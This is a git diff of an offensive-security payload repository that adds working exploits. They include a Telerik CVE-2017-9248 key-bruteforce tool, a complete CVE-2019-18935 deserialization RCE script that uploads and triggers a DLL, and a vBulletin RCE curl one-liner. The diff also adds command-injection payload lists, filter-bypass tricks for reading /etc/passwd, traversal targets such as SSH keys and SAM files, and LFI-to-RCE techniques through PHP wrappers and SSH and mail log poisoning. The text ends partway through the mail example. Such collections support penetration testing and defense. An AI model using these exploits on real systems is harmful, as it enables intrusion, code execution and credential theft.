+                          " requests, total so far: " +
+                          str(requests_sent) +
+                          "\n"
+                      )
+            sys.stdout.flush()
+            char_requests = 0
+        else:
+            sys.stdout.write("\b"*7 + "Not found, quitting\n")
+            sys.stdout.flush()
+            break
+    if keychar is not False:
+        print("Found key: " +
+              (
+                found
+                if unprintable is False
+                else "(hex) " + binascii.hexlify(found.encode()).decode()
+              )
+              )
+    print("Total web requests: " + str(requests_sent))
+    return found
+
+
+def mode_brutekey():
+    session = requests.Session()
+    found = get_key(session)
+
+    if found == '':
+        return
+    else:
+        urls = {}
+        url_path = args.url
+        params = (
+                    '?DialogName=DocumentManager' +
+                    '&renderMode=2' +
+                    '&Skin=Default' +
+                    '&Title=Document%20Manager' +
+                    '&dpptn=' +
+                    '&isRtl=false' +
+                    '&dp='
+                  )
+        versions = [
+                    '2007.1423', '2007.1521', '2007.1626', '2007.2918',
+                    '2007.21010', '2007.21107', '2007.31218', '2007.31314',
+                    '2007.31425', '2008.1415', '2008.1515', '2008.1619',
+                    '2008.2723', '2008.2826', '2008.21001', '2008.31105',
+                    '2008.31125', '2008.31314', '2009.1311', '2009.1402',
+                    '2009.1527', '2009.2701', '2009.2826', '2009.31103',
+                    '2009.31208', '2009.31314', '2010.1309', '2010.1415',
+                    '2010.1519', '2010.2713', '2010.2826', '2010.2929',
+                    '2010.31109', '2010.31215', '2010.31317', '2011.1315',
+                    '2011.1413', '2011.1519', '2011.2712', '2011.2915',
+                    '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
+                    '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
+                    '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
+                    '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
+                    '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
+                    '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
+                    '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
+                    '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
+                    '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
+                    '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
+                    '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
+                    '2017.3.913'
+                    ]
+
+        plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
+        plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
+        plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
+        plaintext3 = ';AllowMultipleSelection,False,3,False'
+
+        if len(args.version) > 0:
+            versions = [args.version]
+
+        for version in versions:
+            plaintext2_raw2 = version
+            plaintext2 = base64.b64encode(
+                            (plaintext2_raw1 +
+                                plaintext2_raw2 +
+                                plaintext2_raw3
+                             ).encode()
+                        ).decode()
+            plaintext = plaintext1 + plaintext2 + plaintext3
+            plaintext = base64.b64encode(
+                            plaintext.encode()
+                        ).decode()
+            ciphertext = base64.b64encode(
+                            encrypt(
+                                plaintext,
+                                found
+                            ).encode()
+                        ).decode()
+            full_url = url_path + params + ciphertext
+            urls[version] = full_url
+
+        found_valid_version = False
+        for version in urls:
+            url = urls[version]
+            request = requests.Request('GET', url)
+            request = request.prepare()
+            response = session.send(request, verify=False, proxies=getProxy(args.proxy))
+            if response.status_code == 500:
+                continue
+            else:
+                match = re.search(
+                    "(Error Message:)(.+\n*.+)(</div>)",
+                    response.text
+                    )
+                if match is None:
+                    print(version + ": " + url)
+                    found_valid_version = True
+                    break
+
+        if not found_valid_version:
+            print("No valid version found")
+
+def mode_samples():
+    print("Samples for testing decryption and encryption functions:")
+    print("-d ciphertext key")
+    print("-e plaintext key")
+    print("")
+    print("Key:")
+    print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D")
+    print("")
+    print("Plaintext:")
+    print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False")
+    print("")
+    print("Ciphertext:")
+    print("FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+")
+    print("")
+
+
+def mode_b64e():
+    print(base64.b64encode(args.parameter.encode()).decode())
+    print("")
+
+
+def mode_b64d():
+    print(base64.b64decode(args.parameter.encode()).decode())
+    print("")
+
+sys.stderr.write(
+              "\ndp_crypto by Paul Taylor / @bao7uo\nCVE-2017-9248 - " +
+              "Telerik.Web.UI.dll Cryptographic compromise\n\n"
+            )
+
+p = argparse.ArgumentParser()
+subparsers = p.add_subparsers()
+
+decrypt_parser = subparsers.add_parser('d', help='Decrypt a ciphertext')
+decrypt_parser.set_defaults(func=mode_decrypt)
+decrypt_parser.add_argument('ciphertext', action='store', type=str, default='', help='Ciphertext to decrypt')
+decrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
+
+encrypt_parser = subparsers.add_parser('e', help='Encrypt a plaintext')
+encrypt_parser.set_defaults(func=mode_encrypt)
+encrypt_parser.add_argument('plaintext', action='store', type=str, default='', help='Ciphertext to decrypt')
+encrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
+
+brute_parser = subparsers.add_parser('k', help='Bruteforce key/generate URL')
+brute_parser.set_defaults(func=mode_brutekey)
+brute_parser.add_argument('-u', '--url', action='store', type=str, help='Target URL')
+brute_parser.add_argument('-l', '--key-len', action='store', type=int, default=48, help='Len of the key to retrieve, OPTIONAL: default is 48')
+brute_parser.add_argument('-o', '--oracle', action='store', type=str, default='Index was outside the bounds of the array.', help='The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message')
+brute_parser.add_argument('-v', '--version', action='store', type=str, default='', help='OPTIONAL. Specify the version to use rather than iterating over all of them')
+brute_parser.add_argument('-c', '--charset', action='store', type=str, default='hex', help='Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex')
+brute_parser.add_argument('-a', '--accuracy', action='store', type=int, default=9, help='Maximum accuracy is out of 64 where 64 is the most accurate, \
+    accuracy of 9 will usually suffice for a hex, but 21 or more might be needed when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.')
+brute_parser.add_argument('-p', '--proxy', action='store', type=str, default='', help='Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080')
+
+encode_parser = subparsers.add_parser('b', help='Encode parameter to base64')
+encode_parser.set_defaults(func=mode_b64e)
+encode_parser.add_argument('parameter', action='store', type=str, help='Parameter to encode')
+
+decode_parser = subparsers.add_parser('p', help='Decode base64 parameter')
+decode_parser.set_defaults(func=mode_b64d)
+decode_parser.add_argument('parameter', action='store', type=str, help='Parameter to decode')
+
+args = p.parse_args()
+
+if len(sys.argv) > 2:
+    args.func()
diff --git a/CVE Exploits/Telerik CVE-2019-18935.py b/CVE Exploits/Telerik CVE-2019-18935.py
new file mode 100644
index 00000000..b2553513
--- /dev/null
+++ b/CVE Exploits/Telerik CVE-2019-18935.py	
@@ -0,0 +1,140 @@
+#!/usr/bin/env python3
+# origin : https://github.com/noperator/CVE-2019-18935
+# INSTALL: 
+# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
+#  python3 -m venv env
+#  source env/bin/activate
+#  pip3 install -r requirements.txt
+
+# Import encryption routines.
+from sys import path
+path.insert(1, 'RAU_crypto')
+from RAU_crypto import RAUCipher
+
+from argparse import ArgumentParser
+from json import dumps, loads
+from os.path import basename, splitext
+from pprint import pprint
+from requests import post
+from requests.packages.urllib3 import disable_warnings
+from sys import stderr
+from time import time
+from urllib3.exceptions import InsecureRequestWarning
+
+disable_warnings(category=InsecureRequestWarning)
+
+def send_request(files):
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
+        'Connection': 'close',
+        'Accept-Language': 'en-US,en;q=0.5',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+        'Upgrade-Insecure-Requests': '1'
+    }
+    response = post(url, files=files, verify=False, headers=headers)
+    try:
+        result = loads(response.text)
+        result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
+        pprint(result)
+    except:
+        print(response.text)
+
+def build_raupostdata(object, type):
+    return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
+
+def upload():
+
+    # Build rauPostData.
+    object = {
+        'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
+        'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
+        'MaxFileSize': 0,
+        'TimeToLive': {  # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
+            'Ticks': 1440000000000,
+            'Days': 0,
+            'Hours': 40,
+            'Minutes': 0,
+            'Seconds': 0,
+            'Milliseconds': 0,
+            'TotalDays': 1.6666666666666666,
+            'TotalHours': 40,
+            'TotalMinutes': 2400,
+            'TotalSeconds': 144000,
+            'TotalMilliseconds': 144000000
+        },
+        'UseApplicationPoolImpersonation': False
+    }
+    type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
+    raupostdata = build_raupostdata(object, type)
+    
+    with open(filename_local, 'rb') as f:
+        payload = f.read()
+    
+    metadata = {
+        'TotalChunks': 1,
+        'ChunkIndex': 0,
+        'TotalFileSize': 1,
+        'UploadID': filename_remote  # Determines remote filename on disk.
+    }
+    
+    # Build multipart form data.
+    files = {
+        'rauPostData': (None, raupostdata),
+        'file': (filename_remote, payload, 'application/octet-stream'),
+        'fileName': (None, filename_remote),
+        'contentType': (None, 'application/octet-stream'),
+        'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
+        'metadata': (None, dumps(metadata))
+    }
+    
+    # Send request.
+    print('[*] Local payload name: ', filename_local, file=stderr)
+    print('[*] Destination folder: ', temp_target_folder, file=stderr)
+    print('[*] Remote payload name:', filename_remote, file=stderr)
+    print(file=stderr)
+    send_request(files)
+
+def deserialize():
+
+    # Build rauPostData.
+    object = {
+        'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
+    }
+    type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
+    raupostdata = build_raupostdata(object, type)
+    
+    # Build multipart form data.
+    files = {
+        'rauPostData': (None, raupostdata),  # Only need this now.
+        '': ''  # One extra input is required for the page to process the request.
+    }
+    
+    # Send request.
+    print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
+    start = time()
+    send_request(files)
+    end = time()
+    print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
+
+if __name__ == '__main__':
+    parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
+    parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
+    parser.add_argument('-v', dest='ui_version', required=True, help='software version')
+    parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
+    parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
+    parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
+    parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
+    args = parser.parse_args()
+
+    temp_target_folder = args.folder.replace('/', '\\')
+    ui_version = args.ui_version
+    net_version = args.net_version
+    filename_local = args.payload
+    filename_remote = str(time()) + splitext(basename(filename_local))[1]
+    url = args.url
+
+    upload()
+
+    if not args.test_upload:
+        deserialize()
+
diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh
new file mode 100644
index 00000000..3ebf64a2
--- /dev/null
+++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh	
@@ -0,0 +1 @@
+curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
\ No newline at end of file
diff --git a/Command Injection/Intruder/command-execution-unix.txt b/Command Injection/Intruder/command-execution-unix.txt
index 3437f992..30d957a8 100644
--- a/Command Injection/Intruder/command-execution-unix.txt	
+++ b/Command Injection/Intruder/command-execution-unix.txt	
@@ -3,19 +3,28 @@
 &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 /index.html|id|
+";id;"
+';id;'
 ;id;
 ;id
 ;netstat -a;
-;id;
+"|id|"
+'|id|'
 |id
 |/usr/bin/id
 |id|
+"|/usr/bin/id|"
+'|/usr/bin/id|'
 |/usr/bin/id|
+"||/usr/bin/id|"
+'||/usr/bin/id|'
 ||/usr/bin/id|
 |id;
 ||/usr/bin/id;
 ;id|
 ;|/usr/bin/id|
+"\n/bin/ls -al\n"
+'\n/bin/ls -al\n'
 \n/bin/ls -al\n
 \n/usr/bin/id\n
 \nid\n
@@ -56,8 +65,12 @@ a|/usr/bin/id
 %0Acat%20/etc/passwd
 %0A/usr/bin/id
 %0Aid
+%22%0A/usr/bin/id%0A%22
+%27%0A/usr/bin/id%0A%27
 %0A/usr/bin/id%0A
 %0Aid%0A
+"& ping -i 30 127.0.0.1 &"
+'& ping -i 30 127.0.0.1 &'
 & ping -i 30 127.0.0.1 &
 & ping -n 30 127.0.0.1 &
 %0a ping -i 30 127.0.0.1 %0a
diff --git a/Command Injection/README.md b/Command Injection/README.md
index bb4ff61d..8370522a 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -12,11 +12,12 @@
 * [Filter Bypasses](#filter-bypasses)
   * [Bypass without space](#bypass-without-space)
   * [Bypass with a line return](#bypass-with-a-line-return)
+  * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
   * [Bypass blacklisted words](#bypass-blacklisted-words)
-   * [Bypass with single quote](#bypass-with-a-single-quote)
-   * [Bypass with double quote](#bypass-with-a-double-quote)
+   * [Bypass with single quote](#bypass-with-single-quote)
+   * [Bypass with double quote](#bypass-with-double-quote)
    * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
-   * [Bypass with $@](#bypass-with-----)
+   * [Bypass with $@](#bypass-with-)
    * [Bypass with variable expansion](#bypass-with-variable-expansion)
    * [Bypass with wildcards](#bypass-with-wildcards)
 * [Challenge](#challenge)
@@ -108,6 +109,58 @@ ping%PROGRAMFILES:~10,-5%IP
 something%0Acat%20/etc/passwd
 ```
 
+### Bypass characters filter via hex encoding
+
+linux
+```
+swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
+/etc/passwd
+
+swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
+root:x:0:0:root:/root:/bin/bash
+
+swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
+root:x:0:0:root:/root:/bin/bash
+
+swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
+root:x:0:0:root:/root:/bin/bash
+
+swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764
+/etc/passwd
+
+swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764`
+root:x:0:0:root:/root:/bin/bash
+
+swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
+/etc/passwd
+
+swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
+root:x:0:0:root:/root:/bin/bash
+
+```
+
+### Bypass characters filter
+
+Commands execution without backslash and slash - linux bash
+
+```
+swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
+/
+
+swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
+root:x:0:0:root:/root:/bin/bash
+
+swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
+/
+
+swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
+/
+
+swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
+root:x:0:0:root:/root:/bin/bash
+
+```
+
 ### Bypass Blacklisted words
 
 #### Bypass with single quote
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index b746ffa7..ec975de3 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -4,8 +4,26 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Basic exploitation](#basic-exploitation)
+    * [16 bits Unicode encoding](#16-bits-unicode-encoding)
+    * [UTF-8 Unicode encoding](#utf-8-unicode-encoding)
+    * [Bypass "../" replaced by ""](#bypass--replaced-by-)
+    * [Bypass "../" with ";"](#bypass--with-)
+    * [Double URL encoding](#double-url-encoding)
+    * [UNC Bypass](#unc-bypass)
 * [Path Traversal](#path-traversal)
+    * [Interesting Linux files](#interesting-linux-files)
+    * [Interesting Windows files](#interesting-windows-files)
+* [References](#references)
+
+## Tools
+
+- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
+    ```powershell
+    git clone https://github.com/wireghoul/dotdotpwn
+    perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
+    ```
 
 ## Basic exploitation
 
@@ -22,7 +40,7 @@ We can use the `..` characters to access the parent directory, the following str
 %uff0e%uff0e%u2216
 ```
 
-16 bit Unicode encoding
+### 16 bits Unicode encoding
 
 ```powershell
 . = %u002e
@@ -30,7 +48,7 @@ We can use the `..` characters to access the parent directory, the following str
 \ = %u2216
 ```
 
-UTF-8 Unicode encoding
+### UTF-8 Unicode encoding
 
 ```powershell
 . = %c0%2e, %e0%40%ae, %c0ae
@@ -38,6 +56,7 @@ UTF-8 Unicode encoding
 \ = %c0%5c, %c0%80%5c
 ```
 
+### Bypass "../" replaced by ""
 Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
 
 ```powershell
@@ -45,7 +64,14 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
 ...\.\
 ```
 
-Double URL encoding
+### Bypass "../" with ";"
+
+```powershell
+..;/
+http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
+```
+
+### Double URL encoding
 
 ```powershell
 . = %252e
@@ -53,10 +79,20 @@ Double URL encoding
 \ = %255c
 ```
 
+**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
+
+### UNC Bypass
+
+An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
+
+```powershell
+\\localhost\c$\windows\win.ini
+```
+
 
 ## Path Traversal
 
-Linux - Interesting files to check out :
+### Interesting Linux files
 
 ```powershell
 /etc/issue
@@ -76,9 +112,18 @@ Linux - Interesting files to check out :
 /proc/net/route
 /proc/net/tcp
 /proc/net/udp
+/proc/self/cwd/index.php
+/proc/self/cwd/main.py
+/home/$USER/.bash_history
+/home/$USER/.ssh/id_rsa
+/var/run/secrets/kubernetes.io/serviceaccount
+/var/lib/mlocate/mlocate.db
+/var/lib/mlocate.db
 ```
 
-Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
+### Interesting Windows files
+
+Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 
 ```powershell
 c:/boot.ini
@@ -101,6 +146,8 @@ c:/unattend.txt
 c:/unattend.xml
 c:/unattended.txt
 c:/unattended.xml
+c:/windows/repair/sam
+c:/windows/repair/system
 ```
 
 The following log files are controllable and can be included with an evil payload to achieve a command execution
@@ -118,15 +165,7 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 
-Other easy win files.
-
-```powershell
-/proc/self/cwd/index.php
-/home/$USER/.bash_history
-/var/run/secrets/kubernetes.io/serviceaccount
-```
-
-
 ## References
 
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
+* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 6c54db95..964961a8 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -6,9 +6,11 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Basic LFI](#basic-lfi)
     * [Null byte](#null-byte)
     * [Double encoding](#double-encoding)
+    * [UTF-8 encoding](#utf-8-encoding)
     * [Path and dot truncation](#path-and-dot-truncation)
     * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
@@ -26,6 +28,13 @@
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files)
+
+## Tools
+
+* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
+* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
+* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
 
 ## Basic LFI
 
@@ -37,6 +46,8 @@ http://example.com/index.php?page=../../../etc/passwd
 
 ### Null byte
 
+:warning: In versions of PHP below 5.3.4 we can terminate with null byte.
+
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
@@ -48,6 +59,13 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
 
+### UTF-8 encoding
+
+```powershell
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
+```
+
 ### Path and dot truncation
 
 On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
@@ -104,6 +122,7 @@ The part "php://filter" is case insensitive
 
 ```powershell
 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
+http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 ```
@@ -114,7 +133,14 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
-NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times using `|` or `/`: 
+- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
+- deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
+
+```powershell
+./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
+curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
+```
 
 ### Wrapper zip://
 
@@ -145,11 +171,16 @@ http://example.com/index.php?page=expect://ls
 
 ### Wrapper input://
 
-Specify your payload in the POST parameters
+Specify your payload in the POST parameters, this can be done with a simple `curl` command.
 
 ```powershell
-http://example.com/index.php?page=php://input
-POST DATA: <?php system('id'); ?>
+curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v
+```
+
+Alternatively, Kadimus has a module to automate this attack.
+
+```powershell
+./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input
 ```
 
 ### Wrapper phar://
@@ -243,9 +274,14 @@ print('[x] Something went wrong, please try again')
 
 ## LFI to RCE via phpinfo()
 
-https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**.
+
+> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
+
 Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 
+Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+
 ## LFI to RCE via controlled log file
 
 Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
@@ -263,6 +299,49 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 
+### RCE via SSH
+
+Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.
+
+```powershell
+ssh <?php system($_GET["cmd"]);?>@10.10.10.10
+```
+
+Then include the SSH log files inside the Web Application.
+
+```powershell
+http://example.com/index.php?page=/var/log/auth.log&cmd=id
+```
+
+### RCE via Mail
+
+First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
+
+```powershell
+root@kali:~# telnet 10.10.10.10. 25
+Trying 10.10.10.10....
+Connected to 10.10.10.10..
+Escape character is '^]'.
+220 straylight ESMTP Postfix (Debian/GNU)
+helo ok
+250 straylight
+mail from: mail@example.com
+250 2.1.0 Ok
+rcpt to: root
